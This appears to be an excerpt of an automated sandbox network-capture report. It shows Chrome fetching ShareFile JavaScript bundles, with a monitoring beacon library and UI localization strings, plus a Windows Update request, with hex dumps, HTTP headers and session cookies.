                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1378INData Raw: 74 75 72 65 22 29 29 7d 3b 76 61 72 20 61 3d 6e 2e 65 78 70 6f 72 74 73 2e 61 63 74 69 76 65 3d 7b 7d 7d 2c 7b 7d 5d 2c 39 3a 5b 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 74 2c 6e 2c 65 29 7b 74 68 69 73 2e 6c 6f 61 64 65 72 3d 74 2c 74 68 69 73 2e 65 6e 64 70 6f 69 6e 74 3d 6e 2c 74 68 69 73 2e 6f 70 74 73 3d 65 7c 7c 7b 7d 2c 74 68 69 73 2e 73 74 61 72 74 65 64 3d 21 31 2c 74 68 69 73 2e 74 69 6d 65 6f 75 74 48 61 6e 64 6c 65 3d 6e 75 6c 6c 7d 76 61 72 20 69 3d 74 28 31 30 29 2c 6f 3d 74 28 32 35 29 3b 6e 2e 65 78 70 6f 72 74 73 3d 72 2c 72 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 54 69 6d 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 74 68 69 73 2e 69 6e 74 65 72 76 61 6c 3d 74 2c 74 68 69 73 2e 73 74
                                                                                                                                                                                                                      Data Ascii: ture"))};var a=n.exports.active={}},{}],9:[function(t,n,e){function r(t,n,e){this.loader=t,this.endpoint=n,this.opts=e||{},this.started=!1,this.timeoutHandle=null}var i=t(10),o=t(25);n.exports=r,r.prototype.startTimer=function(t,n){this.interval=t,this.st
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1378INData Raw: 72 28 74 29 7b 69 66 28 74 2e 69 6e 66 6f 2e 62 65 61 63 6f 6e 29 7b 74 2e 69 6e 66 6f 2e 71 75 65 75 65 54 69 6d 65 26 26 53 2e 73 74 6f 72 65 28 22 6d 65 61 73 75 72 65 73 22 2c 22 71 74 22 2c 7b 76 61 6c 75 65 3a 74 2e 69 6e 66 6f 2e 71 75 65 75 65 54 69 6d 65 7d 29 2c 74 2e 69 6e 66 6f 2e 61 70 70 6c 69 63 61 74 69 6f 6e 54 69 6d 65 26 26 53 2e 73 74 6f 72 65 28 22 6d 65 61 73 75 72 65 73 22 2c 22 61 70 22 2c 7b 76 61 6c 75 65 3a 74 2e 69 6e 66 6f 2e 61 70 70 6c 69 63 61 74 69 6f 6e 54 69 6d 65 7d 29 2c 6a 2e 6d 65 61 73 75 72 65 28 22 62 65 22 2c 22 73 74 61 72 74 74 69 6d 65 22 2c 22 66 69 72 73 74 62 79 74 65 22 29 2c 6a 2e 6d 65 61 73 75 72 65 28 22 66 65 22 2c 22 66 69 72 73 74 62 79 74 65 22 2c 22 6f 6e 6c 6f 61 64 22 29 2c 6a 2e 6d 65 61 73 75
                                                                                                                                                                                                                      Data Ascii: r(t){if(t.info.beacon){t.info.queueTime&&S.store("measures","qt",{value:t.info.queueTime}),t.info.applicationTime&&S.store("measures","ap",{value:t.info.applicationTime}),j.measure("be","starttime","firstbyte"),j.measure("fe","firstbyte","onload"),j.measu
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1378INData Raw: 3d 73 3f 6e 75 6c 6c 3a 73 29 29 3b 76 61 72 20 75 3d 77 2e 66 72 6f 6d 41 72 72 61 79 28 69 2c 74 2e 6d 61 78 42 79 74 65 73 29 3b 54 2e 6a 73 6f 6e 70 28 49 2b 22 3a 2f 2f 22 2b 74 2e 69 6e 66 6f 2e 62 65 61 63 6f 6e 2b 22 2f 22 2b 72 2b 22 2f 22 2b 74 2e 69 6e 66 6f 2e 6c 69 63 65 6e 73 65 4b 65 79 2b 75 2c 55 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 76 61 72 20 6e 3d 79 28 4f 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 73 28 6e 2c 74 2c 7b 75 6e 6c 6f 61 64 3a 21 30 7d 29 7d 29 3b 72 65 74 75 72 6e 20 45 28 6e 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 7c 7c 6e 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 2c 6e 29 7b 66 6f 72 28 76 61 72 20 65 3d 76 28 29 2c 72 3d 76 28 29 2c 69 3d 4f 5b
                                                                                                                                                                                                                      Data Ascii: =s?null:s));var u=w.fromArray(i,t.maxBytes);T.jsonp(I+"://"+t.info.beacon+"/"+r+"/"+t.info.licenseKey+u,U)}}}function i(t){var n=y(O,function(n){return s(n,t,{unload:!0})});return E(n,o)}function o(t,n){return t||n}function a(t,n){for(var e=v(),r=v(),i=O[
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1378INData Raw: 65 2e 62 6f 64 79 2c 6e 2e 6d 61 78 42 79 74 65 73 29 29 29 2c 6c 7d 66 75 6e 63 74 69 6f 6e 20 64 28 74 2c 6e 29 7b 6e 3d 6e 7c 7c 7b 7d 3b 76 61 72 20 65 2c 72 3b 69 66 28 6e 2e 6e 65 65 64 52 65 73 70 6f 6e 73 65 29 7b 69 66 28 21 5f 29 72 65 74 75 72 6e 21 31 3b 72 3d 21 30 2c 65 3d 54 2e 78 68 72 7d 65 6c 73 65 20 69 66 28 6e 2e 75 6e 6c 6f 61 64 29 72 3d 50 2c 65 3d 50 3f 54 2e 62 65 61 63 6f 6e 3a 54 2e 69 6d 67 3b 65 6c 73 65 20 69 66 28 5f 29 72 3d 21 30 2c 65 3d 54 2e 78 68 72 3b 65 6c 73 65 7b 69 66 28 22 65 76 65 6e 74 73 22 21 3d 3d 74 26 26 22 6a 73 65 72 72 6f 72 73 22 21 3d 3d 74 29 72 65 74 75 72 6e 21 31 3b 65 3d 54 2e 69 6d 67 7d 72 65 74 75 72 6e 7b 6d 65 74 68 6f 64 3a 65 2c 75 73 65 42 6f 64 79 3a 72 7d 7d 66 75 6e 63 74 69 6f 6e 20
                                                                                                                                                                                                                      Data Ascii: e.body,n.maxBytes))),l}function d(t,n){n=n||{};var e,r;if(n.needResponse){if(!_)return!1;r=!0,e=T.xhr}else if(n.unload)r=P,e=P?T.beacon:T.img;else if(_)r=!0,e=T.xhr;else{if("events"!==t&&"jserrors"!==t)return!1;e=T.img}return{method:e,useBody:r}}function
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1378INData Raw: 74 65 6e 65 72 73 3a 70 2c 67 65 74 53 75 62 6d 69 74 4d 65 74 68 6f 64 3a 64 7d 7d 2c 7b 7d 5d 2c 31 31 3a 5b 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 76 61 72 20 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 72 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 37 5d 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 38 5d 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 39 5d 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c
                                                                                                                                                                                                                      Data Ascii: teners:p,getSubmitMethod:d}},{}],11:[function(t,n,e){var r=document.createElement("div");r.innerHTML="...[if lte IE 6]><div></div><![endif]-->...[if lte IE 7]><div></div><![endif]-->...[if lte IE 8]><div></div><![endif]-->...[if lte IE 9]><div></div><
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1378INData Raw: 74 69 6f 6e 20 72 28 74 2c 6e 29 7b 76 61 72 20 65 3d 74 5b 22 6e 61 76 69 67 61 74 69 6f 6e 22 2b 61 5d 3b 72 65 74 75 72 6e 20 6e 2e 6f 66 3d 65 2c 6f 28 65 2c 65 2c 6e 2c 22 6e 22 29 2c 6f 28 74 5b 75 2b 61 5d 2c 65 2c 6e 2c 22 75 22 29 2c 6f 28 74 5b 63 2b 61 5d 2c 65 2c 6e 2c 22 72 22 29 2c 6f 28 74 5b 75 2b 73 5d 2c 65 2c 6e 2c 22 75 65 22 29 2c 6f 28 74 5b 63 2b 73 5d 2c 65 2c 6e 2c 22 72 65 22 29 2c 6f 28 74 5b 22 66 65 74 63 68 22 2b 61 5d 2c 65 2c 6e 2c 22 66 22 29 2c 6f 28 74 5b 66 2b 61 5d 2c 65 2c 6e 2c 22 64 6e 22 29 2c 6f 28 74 5b 66 2b 73 5d 2c 65 2c 6e 2c 22 64 6e 65 22 29 2c 6f 28 74 5b 22 63 22 2b 64 2b 61 5d 2c 65 2c 6e 2c 22 63 22 29 2c 6f 28 74 5b 22 73 65 63 75 72 65 43 22 2b 64 2b 22 69 6f 6e 22 2b 61 5d 2c 65 2c 6e 2c 22 73 22 29
                                                                                                                                                                                                                      Data Ascii: tion r(t,n){var e=t["navigation"+a];return n.of=e,o(e,e,n,"n"),o(t[u+a],e,n,"u"),o(t[c+a],e,n,"r"),o(t[u+s],e,n,"ue"),o(t[c+s],e,n,"re"),o(t["fetch"+a],e,n,"f"),o(t[f+a],e,n,"dn"),o(t[f+s],e,n,"dne"),o(t["c"+d+a],e,n,"c"),o(t["secureC"+d+"ion"+a],e,n,"s")


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      136192.168.2.175360476.223.1.1664437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1366OUTGET /bundles/c3b78c86faf44765071f.js HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sharefile.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=b9NdwQulFooUJhjtF0VsmbBINM+tpHXToKqMGST3h236PGKN6pSOy5gyza3P51YzqlY3O0qvnRjhP4wPqGXc3vWwrwqk6N0w0S2Vrs+9Iq9bRJV6m//Z+ipzHrO49/Ii42K/SEGlrsjY8+D2rivy9Ajbo5ZilY3QU8E3cCEP4mtQ; AWSALBTGCORS=b9NdwQulFooUJhjtF0VsmbBINM+tpHXToKqMGST3h236PGKN6pSOy5gyza3P51YzqlY3O0qvnRjhP4wPqGXc3vWwrwqk6N0w0S2Vrs+9Iq9bRJV6m//Z+ipzHrO49/Ii42K/SEGlrsjY8+D2rivy9Ajbo5ZilY3QU8E3cCEP4mtQ; AWSALB=2e/GWqMH4HpQglsaX6MbrKdlsWRVN5vcxPrXAX3WjwbTD9Ta2F3zi6ymCb8REc5cLuFv23bnZZR//ymJOa3evZedGeOMrUfYMtdq5f5MVcVZpWDlPTflkMp9C5Jm; AWSALBCORS=2e/GWqMH4HpQglsaX6MbrKdlsWRVN5vcxPrXAX3WjwbTD9Ta2F3zi6ymCb8REc5cLuFv23bnZZR//ymJOa3evZedGeOMrUfYMtdq5f5MVcVZpWDlPTflkMp9C5Jm
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1428INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:28 GMT
                                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                                      Content-Length: 972
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=//w99oKiIg1rm7rqSGk98l7EpMmtRWvDAPUokeZ1w7KWdI5BlXtiGCg10cWYB67mShx+wLqcIOFdhwOdubQYX8eodQ7zMd4lUYtHKITgpBWCFQ7JK8yhdSJmeXgtnN9s38mlP2U0hC7zvQLty37RQ/lyeipGyNFlr6rFkVuTXbD6; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=//w99oKiIg1rm7rqSGk98l7EpMmtRWvDAPUokeZ1w7KWdI5BlXtiGCg10cWYB67mShx+wLqcIOFdhwOdubQYX8eodQ7zMd4lUYtHKITgpBWCFQ7JK8yhdSJmeXgtnN9s38mlP2U0hC7zvQLty37RQ/lyeipGyNFlr6rFkVuTXbD6; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=sCxkK/tVUyIA8JteZfo2ghjHmnndQV38VTEaea+WJsH7nCrIpTJwqqLvGChvXox/1vqN38MhSL09CHa85lFiFwJYpanrkmE6BOt/RnZaNZWRWQQoiznAIQoXwdoh; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=sCxkK/tVUyIA8JteZfo2ghjHmnndQV38VTEaea+WJsH7nCrIpTJwqqLvGChvXox/1vqN38MhSL09CHa85lFiFwJYpanrkmE6BOt/RnZaNZWRWQQoiznAIQoXwdoh; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                      ETag: "1db2f60e56c2c4c"
                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                      X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC972INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 31 33 35 5d 2c 7b 39 33 31 33 35 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 7b 22 46 69 6c 65 44 72 6f 70 22 3a 7b 22 63 68 6f 6f 73 65 5f 72 65 63 69 70 69 65 6e 74 22 3a 22 43 68 6f 6f 73 65 20 52 65 63 69 70 69 65 6e 74 22 2c 22 63 6c 65 61 72 22 3a 22 63 6c 65 61 72 22 2c 22 72 65 63 69 70 69 65 6e 74 22 3a 22 52 65
                                                                                                                                                                                                                      Data Ascii: "use strict";(self.webpackChunk_sharefiledev_sharefile_appshell=self.webpackChunk_sharefiledev_sharefile_appshell||[]).push([[3135],{93135:function(e){e.exports=JSON.parse('{"FileDrop":{"choose_recipient":"Choose Recipient","clear":"clear","recipient":"Re


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      137192.168.2.175360376.223.1.1664437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1366OUTGET /bundles/50838dcfa76323d03647.js HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sharefile.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=b9NdwQulFooUJhjtF0VsmbBINM+tpHXToKqMGST3h236PGKN6pSOy5gyza3P51YzqlY3O0qvnRjhP4wPqGXc3vWwrwqk6N0w0S2Vrs+9Iq9bRJV6m//Z+ipzHrO49/Ii42K/SEGlrsjY8+D2rivy9Ajbo5ZilY3QU8E3cCEP4mtQ; AWSALBTGCORS=b9NdwQulFooUJhjtF0VsmbBINM+tpHXToKqMGST3h236PGKN6pSOy5gyza3P51YzqlY3O0qvnRjhP4wPqGXc3vWwrwqk6N0w0S2Vrs+9Iq9bRJV6m//Z+ipzHrO49/Ii42K/SEGlrsjY8+D2rivy9Ajbo5ZilY3QU8E3cCEP4mtQ; AWSALB=2e/GWqMH4HpQglsaX6MbrKdlsWRVN5vcxPrXAX3WjwbTD9Ta2F3zi6ymCb8REc5cLuFv23bnZZR//ymJOa3evZedGeOMrUfYMtdq5f5MVcVZpWDlPTflkMp9C5Jm; AWSALBCORS=2e/GWqMH4HpQglsaX6MbrKdlsWRVN5vcxPrXAX3WjwbTD9Ta2F3zi6ymCb8REc5cLuFv23bnZZR//ymJOa3evZedGeOMrUfYMtdq5f5MVcVZpWDlPTflkMp9C5Jm
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1430INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:28 GMT
                                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                                      Content-Length: 35350
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=t15gv1ZdWDeSmUVwYG17mH0G8jcy7ZncaRQLMSox0zw5QEa5Y9wqdvezoFJmvo+1SLHgUg8YGls8nQMTZmyH6sH/We0+4vyhZX9bB8xqljHh8QmZiwbszQdMJDCrJyG4bZ4ysv3NtV7BHjoEC5KBxzNKuqhqqrFdaSKsHCSuMwSL; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=t15gv1ZdWDeSmUVwYG17mH0G8jcy7ZncaRQLMSox0zw5QEa5Y9wqdvezoFJmvo+1SLHgUg8YGls8nQMTZmyH6sH/We0+4vyhZX9bB8xqljHh8QmZiwbszQdMJDCrJyG4bZ4ysv3NtV7BHjoEC5KBxzNKuqhqqrFdaSKsHCSuMwSL; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=TZGgYWywwpSQNvfIW/4XNGC6fu3X1KMwJAsVIbyNsuc1QNpl87guuFUUB/5JPq27/f2faK5PqSj/QAZymNXtU0TdxWipoEsMKDTMzwoMFqNg41DY7J5/CfWZ6chQ; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=TZGgYWywwpSQNvfIW/4XNGC6fu3X1KMwJAsVIbyNsuc1QNpl87guuFUUB/5JPq27/f2faK5PqSj/QAZymNXtU0TdxWipoEsMKDTMzwoMFqNg41DY7J5/CfWZ6chQ; Expires=Tue, 12 Nov 2024 19:36:28 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                      ETag: "1db2f60e56ca596"
                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                      X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC14954INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 32 38 36 5d 2c 7b 32 39 32 38 36 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 65 78 70 6f 72 74 73 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 7b 22 46 69 6c 65 5f 68 61 73 5f 6d 75 6c 74 69 70 6c 65 5f 76 65 72 73 69 6f 6e 73 22 3a 22 46 69 6c 65 20 68 61 73 20 6d 75 6c 74 69 70 6c 65 20 76 65 72 73 69 6f 6e 73 22 2c 22 46 69 6c 65 5f 68 61 73 5f 72 65 73 74 72 69 63 74 65 64 5f 61 63
                                                                                                                                                                                                                      Data Ascii: "use strict";(self.webpackChunk_sharefiledev_sharefile_appshell=self.webpackChunk_sharefiledev_sharefile_appshell||[]).push([[9286],{29286:function(e){e.exports=JSON.parse('{"File_has_multiple_versions":"File has multiple versions","File_has_restricted_ac
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC1430INData Raw: 3a 22 46 6f 6c 64 65 72 20 45 78 70 69 72 61 74 69 6f 6e 20 44 61 74 65 22 2c 22 66 6f 6c 64 65 72 5f 65 78 70 69 72 61 74 69 6f 6e 5f 74 6f 6f 6c 74 69 70 22 3a 22 43 68 61 6e 67 69 6e 67 20 74 68 69 73 20 73 65 74 74 69 6e 67 20 77 69 6c 6c 20 6d 6f 64 69 66 79 20 74 68 65 20 65 78 70 69 72 61 74 69 6f 6e 20 64 61 74 65 20 6f 66 20 61 6c 6c 20 66 69 6c 65 73 20 75 6e 64 65 72 20 74 68 69 73 20 66 6f 6c 64 65 72 2c 20 65 76 65 6e 20 69 66 20 79 6f 75 20 70 72 65 76 69 6f 75 73 6c 79 20 67 61 76 65 20 74 68 65 6d 20 6f 74 68 65 72 20 65 78 70 69 72 61 74 69 6f 6e 20 64 61 74 65 73 2e 22 2c 22 66 6f 6c 64 65 72 5f 73 65 74 74 69 6e 67 73 5f 66 6f 72 22 3a 22 46 6f 6c 64 65 72 20 53 65 74 74 69 6e 67 73 20 66 6f 72 20 5c 27 7b 7b 66 6f 6c 64 65 72 4e 61 6d
                                                                                                                                                                                                                      Data Ascii: :"Folder Expiration Date","folder_expiration_tooltip":"Changing this setting will modify the expiration date of all files under this folder, even if you previously gave them other expiration dates.","folder_settings_for":"Folder Settings for \'{{folderNam
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC8949INData Raw: 61 74 65 72 6d 61 72 6b 22 2c 22 75 73 65 5f 66 6f 6c 64 65 72 5f 74 65 6d 70 6c 61 74 65 22 3a 22 55 73 65 20 61 20 66 6f 6c 64 65 72 20 74 65 6d 70 6c 61 74 65 22 2c 22 76 65 72 73 69 6f 6e 69 6e 67 5f 77 61 72 6e 69 6e 67 22 3a 22 46 69 6c 65 20 56 65 72 73 69 6f 6e 69 6e 67 20 50 6f 6c 69 63 79 20 77 61 73 20 75 70 64 61 74 65 64 20 74 6f 20 7b 7b 76 65 72 73 69 6f 6e 73 7d 7d 20 62 79 20 61 6e 20 61 63 63 6f 75 6e 74 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 20 50 6c 65 61 73 65 20 73 61 76 65 20 74 6f 20 75 70 64 61 74 65 20 74 68 65 20 66 6f 6c 64 65 72 73 20 73 65 74 74 69 6e 67 73 2e 22 2c 22 76 65 72 73 69 6f 6e 73 22 3a 22 76 65 72 73 69 6f 6e 73 22 2c 22 77 61 74 65 72 6d 61 72 6b 65 64 5f 64 6f 77 6e 6c 6f 61 64 73 22 3a 22 57 61 74 65 72
                                                                                                                                                                                                                      Data Ascii: atermark","use_folder_template":"Use a folder template","versioning_warning":"File Versioning Policy was updated to {{versions}} by an account administrator. Please save to update the folders settings.","versions":"versions","watermarked_downloads":"Water
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC10017INData Raw: 22 3a 22 59 6f 75 72 20 71 75 65 73 74 69 6f 6e 20 61 6e 64 20 61 6e 73 77 65 72 20 61 72 65 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 75 6e 64 65 6c 65 74 65 64 2e 22 2c 22 75 6e 73 61 76 65 64 5f 63 68 61 6e 67 65 73 22 3a 22 44 69 73 63 61 72 64 20 43 68 61 6e 67 65 73 22 2c 22 75 6e 73 61 76 65 64 5f 63 68 61 6e 67 65 73 5f 6d 73 67 22 3a 22 59 6f 75 20 68 61 76 65 20 75 6e 73 61 76 65 64 20 63 68 61 6e 67 65 73 2e 20 41 72 65 20 79 6f 75 20 73 75 72 65 20 79 6f 75 20 77 61 6e 74 20 74 6f 20 63 6c 6f 73 65 20 77 69 74 68 6f 75 74 20 73 61 76 69 6e 67 3f 22 2c 22 75 70 64 61 74 65 5f 66 61 69 6c 75 72 65 22 3a 22 55 6e 61 62 6c 65 20 74 6f 20 75 70 64 61 74 65 20 71 75 65 73 74 69 6f 6e 20 61 6e 64 20 61 6e 73 77 65 72 2c 20 70 6c 65 61 73 65 20 74 72
                                                                                                                                                                                                                      Data Ascii: ":"Your question and answer are successfully undeleted.","unsaved_changes":"Discard Changes","unsaved_changes_msg":"You have unsaved changes. Are you sure you want to close without saving?","update_failure":"Unable to update question and answer, please tr


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      138192.168.2.17536024.245.163.56443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=z4zFrrzf2way3o4&MD=RMe6SWZc HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                                                                                                      2024-11-05 19:36:28 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                      MS-CorrelationId: 8e10da80-c6b5-4261-9c27-6dc52a05e017
                                                                                                                                                                                                                      MS-RequestId: ca2ed919-c3ed-4bca-9018-8a71b90b5f5c
                                                                                                                                                                                                                      MS-CV: lKtyS4LP0U+wEBJI.0
                                                                                                                                                                                                                      X-Microsoft-SLSClientCache: 2880
